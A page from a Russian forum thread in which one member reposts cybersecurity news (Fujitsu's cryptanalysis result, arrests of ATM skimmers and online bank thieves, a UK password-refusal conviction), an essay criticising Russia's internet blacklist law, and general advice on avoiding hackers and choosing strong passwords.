Закрытая тема
Страница 8 из 11 ПерваяПервая 1 6 7 8 9 10 11 ПоследняяПоследняя
Показано с 141 по 160 из 204

Тема: хакеры и локспикеры - одна компания

  1. #141
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    Японцы взломали сверхстойкий шифр

    http://www.nestor.minsk.by/kg/


    Эксперты японской компании Fujitsu смогли взломать новый криптографический стандарт pairing-based cryptography. По информации Fujitsu, на полный анализ 923-битного парного криптоключа ушло в общей сложности 148 дней.

    Помог нестандартный подход: ранее, при использовании стандартных механизмов, на выполнение такого рода дешифровки потребовалось бы несколько сотен тысяч лет.

    Для взлома криптоключа эксперты Fujitsu использовали локальную сеть, состоящую из 21 компьютера с общим количеством ядер 252 штуки. Применение новых софтверных технологий позволило проделать требуемые операции в несколько тысяч раз скорее, чем они выполнялись бы с использованием стандартных алгоритмов дешифровки.

    "Приемы криптоанализа становятся все более продвинутыми, а сам процесс криптоанализа постоянно ускоряется, тогда как стойкость алгоритмов защиты, напротив, снижается. В свете этого очень важно оценивать, как долго криптоалгоритмы могут защищать информацию", – говорится в пресс-релизе Fujitsu.

    Новая методика "вскрытия" алгоритмов защиты стала результатом исследования, проведенного исследовательским центром Fujitsu совместно со специалистами из японского Национального института информационных и коммуникационных технологий и Университета Кюсю.
    с уважением

  2. #142
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    http://www.mvd.ru/news/show_110364/

    В Твери задержан мошенник, который при помощи компьютерных технологий считывал информацию с банковских карт граждан
    18 июля 2012 17:04
    В Центральный отдел полиции УМВД России по Тверской области поступило сообщение от сотрудника службы безопасности тверского отделения банка о том, что на одном из банкоматов, расположенном на проспекте Победы, установлено нештатное оборудование.
    В ходе проведения оперативно-разыскных мероприятий сотрудниками полиции была установлена личность злоумышленника. Им оказался 22-летний житель Московской области, ранее судимый за мошенничество.
    В машине молодого человека сотрудники полиции обнаружили и изъяли прибор для считывания информации с банковских карт, портативную видеокамеру и другие приспособления, используемые злоумышленником для осуществления своего преступного замысла. При обыске у жителя Подмосковья также были обнаружены ноутбук с необходимым программным обеспечением и 23 пластиковые модели для изготовления банковских карт. Все это позволило бы ему в дальнейшем присвоить деньги держателей банковских карт.
    В настоящее время по данному факту возбуждено уголовное дело по ст. 272 УК РФ «Неправомерный доступ к компьютерной информации». Гражданин, подозреваемый в совершении данного преступления, задержан в порядке статьи 91 УПК РФ.

    Пресс-служба УМВД России по Тверской области

    _________________________

    http://www.mvd.ru/news/show_110021/
    Пресечена деятельность группы, причастной к хищениям денег в сети Интернет
    13 июля 2012 12:24
    Сотрудниками отдела «К» УМВД России по Ярославской области пресечена деятельность группы лиц, причастных к хищениям денежных средств в сети Интернет.
    Начиная с февраля 2011 года, сотрудниками отдела «К» УМВД России по Ярославской области проводилась оперативная разработка группы лиц, проживающих на территории области и причастных к хищениям денежных средств путем неправомерного доступа к различным информационным системам: «WebMoney», «Яндекс.Деньги», «Yota», «Qiwi», программам «Клиент-банк», систем мгновенных межбанковских переводов денежных средств.
    В ходе проведенного комплекса оперативно-разыскных мероприятий установлены участники указанной преступной группы. Один из членов группы находился в федеральном розыске за совершение аналогичного преступления на территории другого субъекта Российской Федерации.
    С сентября 2011 года он переехал в г. Санкт-Петербург с целью постоянного проживания. В январе 2012 года второй участник указанной группы также переехал в г. Санкт-Петербург.
    В феврале 2012 года в УМВД России по Ярославской области были возбуждены уголовные дела по ч. 3 ст. 159, ст. 272, ст. 273 УК РФ в отношении неустановленных лиц по фактам хищения денежных средств с расчетных счетов банков в крупном размере путем неправомерного доступа к компьютерной информации. Ущерб составил около 2 миллионов рублей.
    В ходе оперативного сопровождения указанных уголовных дел сотрудниками отдела «К» УМВД России по Ярославской области совершен выезд в г. Санкт-Петербург. Совместно с сотрудниками ГУ МВД России по г. Санкт-Петербургу и Ленинградской области организованы и проведены оперативно-разыскные мероприятия, направленные на установление фактических мест жительства фигурантов.
    Адреса проживания фигурантов были установлены и, при силовой поддержке СОБР УМВД России по Ярославской области, сотрудниками полиции по указанным адресам одновременно были проведены обыски. В это же время сотрудниками отдела «К» УМВД России по Ярославской области проведены обыски у остальных участников преступной группы, проживающих в г. Ярославле и г. Угличе Ярославской области.
    В ходе обысков изъята компьютерная техника, носители информации, мобильные телефоны, сим-карты операторов сотовой связи, пластиковые банковские карты в больших количествах, распечатки платежных поручений, договора на открытие банковских счетов третьими лицами, генеральные доверенности. После проведения обысков участники преступной группы были задержаны. Троим из них избрана мера пресечения - заключение под стражу.
    В настоящее время проводится оперативное сопровождения данных уголовных дел с целью установления дополнительных эпизодов преступной деятельности группы.
    Пресс-служба УМВД России по Ярославской области
    с уважением

  3. #143
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    Глава Агентства национальной безопасности США Кит Александер намерен принять участие в хакерской конференции Defcon в Лас-Вегасе с 24 по 27 июля 2012 г. Один из организаторов мероприятия Джефф Мосс рассказал: «Мы покажем ему конференцию, он хочет побродить там» .
    Мосс работает в ICANN руководителем отдела безопасности, он консультант Минобороны США и известен среди хакеров как The Dark Tangent.
    Кит Александер планирует выступить перед участниками Defcon. Организаторы ожидают неоднозначной реакции со стороны хакеров.
    http://www.reuters.com/article/2012/...86K01U20120721
    с уважением

  4. #144
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    Icon11 0

    СУЩЕСТВУЕТ ТАКАЯ ТОЧКА ЗРЕНИЯ
    прочитав подробно данный материал сразу приходит на ум радио Свобода, ясно из каких источников финансируемая и с какими целями "работающая"

    главное - загребать жар чужими руками..



    Автор: Бёрд Киви
    http://www.3dnews.ru/offsyanka/632737/
    Дата: 25.07.2012
    Новоиспеченный российский закон, вводящий для Интернета черные списки (или Hеестр сайтов с запрещенным контентом), вызывает естественные вопросы. Слишком уж много признаков, что декларируется тут одно, а подразумевается нечто существенно иное
    Перед уходом на летние каникулы в парламенте решили вдруг озаботиться защитой молодежи от тлетворного влияния Интернета. И стахановскими темпами придумали-приняли новый закон — о внесении изменений в (другой, еще даже не начавший действовать) федеральный закон «О защите детей от информации, причиняющей вред их здоровью и развитию». Суть внесенных поправок, как все уже знают, сводится к созданию так называемых черных списков, на основании которых по всему государству будет блокироваться интернет-доступ к сайтам с противоправным и вредным контентом. К таковому отнесены детская порнография, пропаганда наркотиков и суицида.
    1censorship.jpg
    Eсли рассуждать абстрактно, то что, казалось бы, в этом плохого? Кто, находясь в здравом уме, будет выступать против борьбы с такой мерзостью, как растление малолетних? Да и по прочим пунктам: всякие нормальные родители, наверное, будут только рады, если государство поможет им оградить своих чад от таких жутких напастей, как наркомания и самоубийство. Проблема в том, что абстрактные рассуждения не годятся для анализа текущей жизни в конкретном государстве. И если в этой стране значительная часть интернет-сообщества, способная внятно и без мата формулировать свою позицию, совершенно определенно выступает против нового закона, то тому должны быть действительно серьезные причины.
    Все, кто интересуется данной историей, наверняка уже не раз читали и слышали многочисленные доводы противников черных списков. Доводы о том, в частности, что российское законодательство и так имеет вполне достаточно статей, позволяющих строго наказывать за преступления, связанные с растлением малолетних или наркобизнесом. Что введение цензуры нигде и никогда не делало общество лучше. Что в технических аспектах предлагаемые законом меры по блокированию запрещенных сайтов на деле эффективно не реализуются, а значит и закон работать не будет...
    Примечательно, что одним из самых сильных контрдоводов, привлекаемых сторонниками нового закона в его защиту, стала формула «все так делают». Иначе говоря, к чему все эти бесплодные споры, если систематической фильтрацией интернет-контента ныне занимаются уже чуть ли не все государства. Не только авторитарные режимы в регионах Азии и Персидского залива, но также вполне демократические власти и в Европе (вроде Британии, Германии, Италии, Франции, стран Скандинавии), и в Австралии, и в Канаде, и в Южной Америке. То есть, можно сказать, Россия тут просто подтягивается к всеобщей мировой тенденции.
    В общем, ясно, наверное, что проблема здесь обозначилась непростая. И для лучшего ее понимания хотелось бы иметь какой-нибудь еще аналитический инструмент, позволяющий выявлять дополнительные и/или скрытые аспекты происходящего. Среди нестандартных подходов к анализу можно выбрать, к примеру, вот такой.
    Теория информации и криптография
    Одной из любопытных особенностей в истории развития прикладной математики XX века стало то, что теория информации и теория криптографии родились практически одновременно. Более того, родителем обеих наук является один и тот же человек — Клод Элвуд Шеннон. Иначе говоря, имеются все — даже чисто медицинские — основания называть эту пару науками-близнецами, описывающими в общем-то одно и то же, но только с несколько разных сторон. Если теория информации занимается тем, каким образом в целостности и без искажений передавать сообщение по каналу, сильно зашумленному помехами, то криптография решает задачу, формулируемую с точностью до наоборот. А именно: каким образом следует искажать сигнал искусственным шумом до такой степени, чтобы противник, подключившийся к каналу передачи, не смог бы понять содержание сообщения.
    Особенно интересным разделом криптографии является криптоанализ — то есть специальный набор математических процедур и приемов для вскрытия шифров (ибо нельзя сконструировать сильный криптоалгоритм, не научившись прежде вскрывать шифры слабые). Понятно, что суть работы криптоаналитика — это получение доступа к сигналу, несмотря на все усилия тех, кто его «зашумлял». То есть можно говорить, что криптоанализ решает ту же самую задачу, что и теория информации, но только в условиях более специфического «шума в канале».

    Но какое отношение вся эта история имеет к принятому ныне в России закону о черных списках для Интернета? Связь тут следующая: стандартный набор процедур, применяемых криптоаналитиками при вскрытии шифров, и в этом случае позволяет «отделить сигнал от шума», обеспечивая таким образом доступ к содержанию данного послания в его исходном, очищенном от помех виде. В криптографии такой сигнал называют «открытым текстом». Конечно же, здесь это «дешифрование» будет проделано без той математической строгости, что присуща современной криптоаналитической науке. Криптография, можно сказать, в данном случае привлекается скорее в качестве наглядной метафоры.

    Статистические аномалии

    Одним из главных внешних признаков качественного криптоалгоритма обычно является статистически ровный шифртекст, похожий на случайную равновероятную последовательность. Всякая же статистическая аномалия в появлении символов и их комбинаций, как правило, указывает на имеющуюся в шифре слабость. Такого рода слабости, ведущие к легкому вскрытию защиты, были характерны, например, для криптографии в первых версиях ОС Windows.

    Применительно к потоку законотворчества нашей Госдумы статистическая аномалия резко обозначилась в июле, когда в течение всего одной недели без каких-либо предварительных обсуждений были внесены, заслушаны и приняты сразу три закона. Причем все три — о клевете, об общественных организациях как «иностранных агентах», о черных списках для вредных интернет-сайтов — характеризуются одной и той же, собственно, особенностью. Все эти инициативы направлены на ограничение имевшихся прежде прав, вводя дополнительную ответственность для всех, кто так или иначе зависит от власти. Говоря подоходчивее, никаких дополнительных свобод эти законы не подразумевают. Речь там идет лишь о новых запретах и о наказаниях за «непослушание».

    Если же вспомнить, что чуть ранее, в июне, был принят и весьма созвучный этим трем новый закон об ограничении свободы собраний, то без всяких статистических расчетов становится вполне очевидно: власти в России заметно встревожены процессами, идущими в обществе, а потому начали поспешно закручивать гайки.
    Частые повторения
    Перейдем к более конкретному рассмотрению нового закона о черных списках для блокирования запрещенных интернет-сайтов. Тут полезно обратиться к специфическому криптоаналитическому приему под названием «выявление повторений». Статистически неслучайные повторения в тексте послания нередко дают весьма мощный рычаг для взлома криптосистемы. Особенно в тех случаях, когда повторения одного и того же вида встречаются часто и именуются техническим термином «стандарты переписки» (любителям историй про Шерлока Холмса для иллюстрации метода можно напомнить сюжет о взломе им шифра пляшущих человечков). В анализируемом нами случае один из стандартов подобного рода очень хорошо известен заранее и выглядит как «детская порнография».
    Законодатели практически всех стран мира каждый раз, когда надо протащить какой-нибудь очередной заведомо непопулярный в обществе закон, снова урезающий гражданские права и свободы, первым делом норовят привлечь в качестве неотразимого аргумента борьбу с детской порнографией и чертовыми педофилами. До недавнего времени столь же безотказно работала нескончаемая война с угрозами терроризма, однако благодаря чрезмерной активности США на данном поприще и абсолютно невыразительным итогам этой борьбы на фоне общей усталости масс, террористическую угрозу ныне перевели в разряд горячего резерва. Короче говоря, аргумент борьбы с «детской порнографией» пока что работает действительно безотказно, а потому привлекается вновь и вновь. В том числе — и для беспощадной войны с плохими веб-сайтами. Длится вся эта борьба уже многие годы, но при этом, что характерно, количество историй о растлении малолетних ничуть не уменьшается.
    На очень выразительных примерах из истории секс-скандалов в католической церкви и в высшем политическом руководстве целого ряда стран хорошо известно, что преступления, связанные с растлением малолетних, регулярно и в массовых масштабах замалчиваются — дабы не порочить авторитет власти и духовенства. Как следствие, идеи борьбы с педофилами и собственно педофилы существуют как бы сами по себе, пересекаясь лишь в отдельных эпизодических случаях, когда заметают лишь каких-нибудь совсем уж незначительных извращенцев.
    Многократное использование одного ключа
    Криптографической теорией и практикой установлено, что даже в тех случаях, когда для засекречивания сообщений используются весьма сильные шифры, обеспечивающие в канале сигнал, статистически никак не отличимый от случайной равновероятной последовательности, все равно имеется реальная возможность вскрытия защиты — если по какой-то причине отправитель для разных посланий использовал один и тот же секретный ключ. Обращаясь к историческим примерам, наглядно иллюстрирующим данную слабость, можно вспомнить знаменитую историю взлома англичанами германского шифратора «Шлюссельцузатц», закрывавшего особо секретную переписку высшего руководства Третьего рейха. Из-за всего одной, но очень серьезной ошибки немецкого шифровальщика, повторно применившего тот же самый ключ, британские криптоаналитики сумели восстановить по шифртекстам всю схему работы шифратора. После чего построили сначала один, а затем и десять «суперкомпьютеров» Colossus, несколько лет обеспечивавших постоянное чтение немецких секретов вплоть до победы над нацизмом.
    Применительно к той борьбе, которую нынешние власти демократических и не очень стран ведут в Интернете с собственными гражданами, пытаясь перекрыть им доступ к сайтам с запрещенным контентом, роль важнейшего элемента системы — или «ключа» — играют так называемые черные списки, содержащие конкретные адреса подлежащих блокированию сайтов. Понятно, что вся эта система хоть как-то способна обозначать свою работоспособность исключительно в условиях сохранения подобных черных списков в строжайшем секрете. Но понятно также и то, что подобные списки невозможно применять однократно — напротив, они действуют постоянно, время от времени лишь пополняясь новыми строчками запретов. Отсюда-то проистекает и их ключевая слабость.
    Как показывает опыт, рано или поздно непременно происходит утечка черного списка в Интернет, обычно через сайты компромата типа WikiLeaks. И тут же любому становится видно, что все эти разговоры про борьбу с детской порнографией и педофилами — просто повод для установления негласного и внесудебного контроля за доступом к информационным интернет-ресурсам. Так было практически всюду, где черные списки сливались в Сеть противниками цензуры. В Таиланде, скажем, где, как и всюду, обосновали сетевую цензуру необходимостью борьбы с детской порнографией, на самом деле свыше 1000 запрещенных сайтов были связаны с критикой правящей королевской семьи. В Австралии лишь треть позиций секретного реестра относилась к запрещенным порносайтам. В Финляндии среди очень далеких от детской порнографии, но все равно запрещенных ресурсов обнаружились сайты, критикующие антидемократическую практику цензуры.
    Открытый текст
    Завершая данные упражнения в криптоанализе законотворческих посланий и отделив маскирующий шум от действительно содержательной информации, мы можем сделать следующий вывод. И в российском, и в международном законодательстве без всяких черных списков давно существует вполне достаточный набор правовых инструментов, позволяющих пресекать и строго наказывать преступления, связанные с растлением малолетних и детской порнографией.

    Конкретно в условиях физического расположения сайтов на территории России госвласти имеют и вполне успешно применяют широчайший набор различных методов для блокирования любых интернет-ресурсов, расцениваемых ими как вредные. Закрытие сайтов может происходить как по решению судов, так и во внесудебном порядке: по представлениям прокуратуры, МВД или Минсвязи, через лишение доменного имени в зоне .RU и/или через физическую конфискацию серверов. То есть фактически вся эта созданная новым законом система — с блокированием адресов через механизмы черных списков — для сайтов на российской территории и не требуется вовсе. Для чего же она может реально пригодиться, так это для быстрого и беспроблемного блокирования любого неугодного властям инфоресурса, находящегося за рубежом. Будь это хоть «Живой журнал», хоть YouTube, хоть сам Google.
    Не факт, конечно, что такая потенциальная возможность будет часто применяться, однако собственно механизм цензуры для этого создан. Причем создано все это в очевидном противоречии с российской Конституцией, где в статье 29, пункт 5, в дословном виде прописана следующая строка: «Гарантируется свобода массовой информации. Цензура запрещается»...
    Информация без смысла
    Одна из важнейших особенностей теории информации (как и криптографии) заключается в том, что наука оперирует исключительно информационными битами, никак не интересуясь смысловым содержанием этих битов. Все, что касается смысла информации, относится уже не к математическо-аналитической части, а к тому, кто именно этой информацией пользуется и ее интерпретирует. Наглядной иллюстрацией этой особенности может служить информация о результатах скачек на ипподроме. Для кого-то набор символов с именем победителя может стать новостью о неожиданном получении целого состояния. Для кого-то еще — трагическим известием о крушении последних надежд. Ну а для подавляющей массы населения тот же самый фрагмент информации пройдет, скорее всего, абсолютно незамеченным — как будто его и не было вовсе.

    Информация о повсеместных попытках насаждения внесудебного блокирования контента в Интернете, что осуществляется вопреки духу и букве всех конституций свободного мира, запрещающих цензуру, относится к той же самой категории. Для кого-то это явный сигнал тревоги, требующий немедленного вмешательства для восстановления утрачиваемых гражданских прав и свобод. Для других — это благая весть, означающая, что власти всех стран — вне зависимости от идеологии и религии — наконец-то вполне единодушны в своем желании иметь инструменты для эффективного контроля за информацией, доступной их гражданам. Ну а для очень значительной массы населения эта новость вообще не означает практически ничего. Им, так сказать, все эти цензуры-несвободы в общем-то до лампады.
    А теория информации и криптография тут совершенно не при чем.
    Для тех, кто интересуется теорией и практикой криптоанализа, базовые приемы взлома простейших шифров популярно и общедоступно описаны в классической работе Эдгара Алана По «Золотой жук». Тем, кто предпочитает более современное и наукообразное изложение, можно посоветовать учебное пособие по основам криптоанализа (к сожалению, только на английском языке) Basic Cryptanalysis.

    http://www.3dnews.ru/offsyanka/632737/
    с уважением

  5. #145
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    Есть такой полезный ресурс http://sms.kaspersky.ru , где можно самостоятельно попытаться разблокировать компьютер когда он внезапно попросит денег


    да и к рекомендациям Мегафона неплохо прислушаться

    8qUmY1uSOEM.jpg
    с уважением

  6. #146
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    Иногда сложные пароли помогут избежать большого наказания...
    http://bezpekaua.com/informacionnaya...-v-tyurmu.html

    Гражданин Великобритании осужден на четыре месяца колонии за то, что не раскрыл полиции пароль к закодированным файлам на своем компьютере.

    19-летний Оливер Дрейг из Фреклтона, графство Ланкашир, был арестован в мае 2010 года в рамках расследования дела о распространении детской порнографии. Его компьютер изъяла полиция, однако она не смогли получить доступ к нужным материалам из-за их надежной криптографической защиты, выполненной применением с 50-символьного пароля.

    Полиция официально запросила пароль у Дрейга, однако он отказался сотрудничать, что является нарушением закона Великобритании о регулировании полномочий следствия (Regulation of Investigatory Powers Act). В результате Королевский суд Престона приговорил Дрейга к 16 неделям пребывания в колонии для молодых преступников. Полиция же до сих пор пытается взломать пароль на компьютере Дрейга.

    «Решение о тюремном заключении демонстрирует, как серьезно суд относится к нарушению данного закона», — прокомментировал ситуацию для Press Association представитель полиции Нейл Фоулер. По его словам, примененный обвинением закон был специально разработан для противодействия использованию интернета в преступных целях.

    На сегодняшний день это всего второй случай вынесения приговора о тюремном заключении по закону о регулировании полномочий следствия. Ранее 33-летний лондонец несколько раз отказывался раскрыть антитеррористической полиции пароли к закодированным файлам на своем компьютере, которые, по его словам, содержали конфиденциальную информацию, связанную с его работой. В сентябре 2008 года его арестовала полиция, а в июне 2009 года он получил девять месяцев тюрьмы. В процессе отбывания срока осужденный попал в психиатрическую клинику...




    на самом деле не верится, что в системах шифрования нет "закладок".. или просто спецслужбы не добрались до разработчиков программного обеспечения для небольшого разговора по душам.. как правило тиски и сварочный аппарат или паяльник помогут найти любой код.

    категорически поддерживаю всевозможные системы кодирования и запароливания личных данных.
    с уважением

  7. #147
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    Ради чего хакер может попытаться атаковать ваш компьютер?
    1. Ради удовольствия. Некоторые люди просто развлекаются, изучая содержимое чужого компьютера и по мере сил его совершенствуя: например, добавляя нецензурные слова в чужие документы. Приятно также блокировать работу чужого компьютера и наблюдать, как дергается, поминутно перезагружаясь, его владелец.
    2. Ради похищения вашего пароля dial-up-доступа в Интернет (чтобы потом ходить по Сети за ваш счет).
    3. Ради похищения ваших денег - извлекая из вашего компьютера номера кредитных карт (маловероятно, но в жизни все бывает).
    4. Чтобы использовать ваш компьютер в роли промежуточного звена или соучастника для другой атаки.
    Атаки на чужие компьютеры любят показывать в боевиках невысокого пошиба, где некий юноша, или еще лучше - скромная девица, с обычного ноутбука взламывает сервер Пентагона или отслеживает перемещение денег на конфиденциальных банковских счетах. Выглядит это довольно эффектно, особенно для людей, уверенных в том, что вирусом можно заразиться, если близко подойти к компьютеру ;-). Возможно, и в реальной жизни наблюдение за хакером не лишено драматизма; но довольно часто любители попастись в Интернете за чужой счет делают ставку не на свои знания и умения, а на чужую наивность.
    Рецепт до обидного прост: от имени "службы поддержки" вашего провайдера-(или от другой столь же солидной организации) приходит письмо, в котором вас просят срочно выслать свой пароль dial-up-доступа. Они, дескать, проводят плановую проверку. Или ищут злоумышленника. Причин, по которым вас просят выслать пароль, может быть много, а результат один: кто-то будет за ваш счет часами сидеть в Интернете. Посему первое правило гласит:
    1. Никогда и никому не высылайте свой пароль доступа в Интернет. При получении писем от провайдера, где это предлагается сделать, немедленно свяжитесь с провайдером - по телефону.
    2. Относитесь к паролям с максимальной серьезностью:
    - не употребляйте простых, легко подбираемых паролей типа года рождения, имени, фамилии, популярных слов и т.д., и уж тем более не делайте паролем свой логин! В качестве пароля рекомендуется выбирать длинную бессмысленную последовательность символов;
    - по возможности, не сохраняйте в системе пароли (не только для установки соединений с Интернетом, но и для электронной почты и др.);
    - периодически (раз в 1-2 месяца) меняйте пароль.
    3. Не заходите на сайты, где предлагают бесплатный Интернет (не бесплатный e-mail).
    4. Не загружайте компоненты ActiveX или Java с чужих веб-страниц.
    5. Обращайте внимание на то, что происходит на вашем компьютере во время сеанса связи с Интернетом. Если вы заметите, что в то время, когда вы не выполняете никаких действий с сетью, индикатор активности передачи данных по сети говорит об обратном, немедленно прекращайте связь и проверяйте свой компьютер антивирусными программами. Индикатором активности работы с сетью может служить внешний модем (лампочки мигают) или значок двух соединенных компьютеров, появляющийся при установлении связи внизу на панели задач (также начинающий мигать в момент активной передачи данных).
    6. Периодически заходите на сервер статистики, предоставляемый провайдером, и сверяйте время. Если сеанс работы в Интернете пришелся на время, когда вы мирно спали или пребывали в командировке - нужно бить тревогу.
    К сожалению, похищением интернет-паролей виртуальное жульничество не исчерпывается; возможности и масштаб мошенничества в Сети заставили бы позеленеть от зависти самого Остапа Бендера.

    http://bezpekaua.com/informacionnaya...t-xakerov.html
    с уважением

  8. #148
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    Надежный пароль для компьютера.
    Используйте как можно больше символов. Каждый дополнительный знак увеличивает степень защиты пароля. Пароль должен содержать не менее 8 знаков; 14 знаков и более являются идеальным вариантом.

    Так как многие системы позволяют использовать знак пробела при создании пароля, можно составить пароль из нескольких слов — парольную фразу. Такие фразы легче запомнить и труднее подобрать.

    Используйте комбинацию из букв, цифр и других символов. Чем больше разных знаков содержит пароль, тем труднее его подобрать. Другие важные сведения:

    Чем меньше разных символов вы используете, тем длиннее должен быть ваш пароль. Пароль из 15 случайно выбранных букв и цифр примерно в 33 тысячи раз надежнее, чем пароль из 8 знаков, содержащий разные типы имеющихся на клавиатуре знаков. Если нет возможности включить в пароль символы, следует сделать его значительно длиннее, чтобы обеспечить ту же степень защиты. Идеальный пароль сочетает в себе длину и разнообразие знаков.

    Используйте все символы клавиатуры, а не только часто используемые. Цифры и символы, вводимые с помощью клавиши Shift, также часто используются при создании паролей. Пароль будет надежнее, если вы используете все имеющиеся на клавиатуре символы, включая знаки препинания, расположенные не в верхнем ряду клавиатуры, и символы, характерные только для вашего языка.

    Используйте слова и фразы, легкие для запоминания, но не очевидные для злоумышленников. Проще всего запомнить пароли и парольные фразы, записав их. Вопреки общепринятому мнению, нет ничего страшного в записи пароля, если данные при этом защищены надлежащим образом.

    Пароли, записанные на бумаге, обычно труднее взломать через Интернет, чем пароли, хранящиеся в диспетчере паролей, на веб-узле или в иной программе для хранения данных.
    Следуйте этим инструкциям для создания надежного пароля.

    1.Придумайте предложение, которое точно не забудете, Это предложение и будет основой для надежного пароля или парольной фразы. Предложение должно быть запоминающимся (например, "Моему сыну Павлу три года").
    2.Убедитесь, что выбранная вами система проверки пароля допускает использование идентификационных фраз. Если имеется возможность использовать парольные фразы (с пробелами между знаками), воспользуйтесь ею.
    3.Если использование идентификационных фраз недопустимо в данной системе, воспользуйтесь обычным паролем. Составьте новое бессмысленное слово из первых букв всех слов, входящих в созданное предложение. В нашем примере получится: "мсптг".
    4.Усложните комбинацию, используя заглавные буквы, строчные буквы и цифры. Можно поменять местами буквы в слове или намеренно допустить орфографические ошибки. Например, в парольной фразе, приведенной выше, можно допустить ошибку в имени или заменить слово "три" на цифру 3. Имеется множество возможных подстановок, и чем длиннее предложение, тем более надежным будет пароль. Наш пример можно преобразовать так: "Моему сыНу Па8лУ 3 годА". Если компьютер или система не поддерживают парольные фразы, тот же метод можно применить и к простому паролю. Например, "мСп3Г".
    5.Наконец, замените отдельные символы. Можно использовать знаки, похожие на буквы, объединять слова (удаляя пробел между ними) и т. п. Следуя нашему примеру, мы получаем: "Моему $ыНуП@в8лУ 3 годА" или "м$п3Г!".
    6.Проверьте свой новый пароль с помощью программы проверки паролей. Программа проверки паролей на данном веб-узле определит надежность выбранного пароля, как только вы его введете и не сохраните при этом.

    Методы создания пароля, которые не следует использовать.

    Существуют общепринятые методы, о которых могут знать и злоумышленники. Во избежание создания ненадежного пароля
    •не используйте последовательные комбинации и повторяющиеся символы. Такие сочетания (например, "12345678", "222222", "abcdefg" или сочетания соседних букв на клавиатуре) не являются надежными паролями.
    •Избегайте использования только замен похожих цифр и символов. Преступников и иных злоумышленников, обладающих достаточными знаниями для подбора и взлома пароля, не удастся ввести в заблуждение подобными заменами, например "i" на "1" или "а" на "@" в словах "M1cr0$0ft" или "П@р0ль". Однако не стоит пренебрегать такими заменами в сочетании с другими методами повышения надежности пароля, такими как увеличение длины, неправильное написание, использование заглавных и строчных букв.
    •Не применяйте свое имя пользователя в качестве пароля. Избегайте также использования иных личных данных (своих или своих близких), таких как имя, дата рождения, код социального страхования и т. д. Эти сведения используются злоумышленниками в первую очередь.
    •Избегайте словарных слов на любом языке. Злоумышленники обладают совершенными средствами, позволяющими быстро подобрать пароли, в основе которых лежат слова из разных языков; слова, написанные задом наперед; распространенные орфографические ошибки и замены, а также все виды ругательств и других слов, которые не произносят при детях.
    •Используйте несколько паролей. При взломе одного компьютера или системы, где используется определенный пароль, опасности подвергаются все прочие данные, защищенные тем же паролем. Настоятельно рекомендуется использовать разные пароли для различных систем.
    •Не сохраняйте пароль в Интернете. Злоумышленник, получивший доступ к вашему паролю в Интернете или в компьютерной сети, получает доступ ко всем данным.

    Использование пустого пароля

    Пустой пароль (отсутствие пароля) более эффективен, чем ненадежный, такой как, например, "1234". Простой пароль легко разгадать, но на компьютерах с Windows XP к учетной записи, не защищенной паролем, нельзя получить доступ через локальную сеть или Интернет (данная функция недоступна в ОС Microsoft Windows 2000, Windows Me и в более ранних версиях). Пустой пароль для учетной записи на компьютере можно использовать, если выполнены перечисленные ниже требования.
    •У вас один или несколько компьютеров, но вам не нужен доступ с одного компьютера на другой.
    •Ваш компьютер физически защищен (вы доверяете всем, кто имеет доступ к вашему компьютеру).

    Не всегда рекомендуется использовать пустой пароль. Например, переносной компьютер скорее всего физически не защищен, и на нем лучше использовать надежный пароль.

    Доступ к паролям и их изменение

    Учетные записи в Интернете
    Веб-узлы имеют различные политики, регулирующие доступ к учетной записи и изменение пароля. На домашней странице веб-узла найдите ссылку (например "Учетная запись"), служащую для перехода на страницу веб-узла, где выполняется управление паролем и учетной записью.

    Пароли на компьютере
    Сведения о создании и изменении учетных записей, защищенных паролями, а также о доступе к ним и о том, как установить защиту паролем при загрузке компьютера, обычно имеются в файлах справки операционной системы. Можно также попытаться найти эти сведения на веб-узле производителя программного обеспечения. Например, в ОС Microsoft Windows XP сведения об управлении паролями, их изменении и т. д. можно найти в системе интерактивной справки.

    Хранение паролей в секрете

    Относитесь к паролям и парольным фразам так же серьезно, как к данным, которые они защищают.

    •Никому не сообщайте пароль. Держите пароль в секрете от своих близких (особенно от детей) и друзей, которые могут сообщить его кому-либо еще. Исключением являются пароли, которые необходимо знать вашим близким, например пароль к вашему банковскому счету в Интернете, который можно сообщить жене или мужу.
    •Храните пароль в надежном месте. Будьте внимательны, если записали пароль на бумаге или какой-либо другой носитель. Не оставляйте записку с паролем там, где вы не оставили бы данные, которые он защищает.
    •Никогда не пересылайте пароль по электронной почте. Любое сообщение электронной почты, содержащее запрос пароля или требующее перейти на веб-узел для подтверждения пароля, почти наверняка является мошенническим. Это относится и к сообщениям такого типа, полученным от надежной компании или человека. Сообщение электронной почты может быть перехвачено, а отправитель запроса может быть совсем не тем, за кого себя выдает. В фишинг-аферах используются мошеннические сообщения электронной почты, обманным путем заставляющие раскрыть имя пользователя и пароль и позволяющие злоумышленникам завладеть идентификационными данными и т. п. Дополнительные сведения о фишинг-аферах и о защите от мошенничества в Интернете.
    •Регулярно меняйте пароли. Это поможет ввести злоумышленников в заблуждение. Чем надежнее пароль, тем дольше можно его использовать. Пароль из 8 знаков или менее можно применять в течение недели, в то время как сочетание из 14 и более знаков может служить несколько лет, если оно составлено по всем правилам, приведенным выше.
